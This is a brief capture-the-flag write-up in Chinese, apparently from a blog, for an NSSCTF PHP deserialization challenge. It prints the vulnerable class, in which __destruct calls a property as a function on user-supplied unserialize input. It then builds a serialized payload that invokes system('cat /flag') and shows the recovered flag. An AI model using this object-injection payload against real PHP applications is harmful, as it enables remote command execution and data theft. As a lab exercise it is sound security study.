<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt;
public $lly;
function __destruct()
{
$a = $this->lt;
$a($this->lly); //这里相当于(this->lt)(this->lly) 即lt(lly)。
}
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>
我们联想到命令执行函数,我们需要构造payload,如果能够把a换成system,lly换成cat,那么就可以进行命令注入。构造payload。
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt='system';
public $lly='cat /flag';
}
$b=new lyh();
echo serialize($b);
?>
输入payload:nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
得到flag:NSSCTF{934dfc44-3e21-47d8-b350-d0c932ffeab9}
标签:__,lly,1z,system,unserialize,lt,2022,nss,payload From: https://blog.csdn.net/2301_80871705/article/details/142962041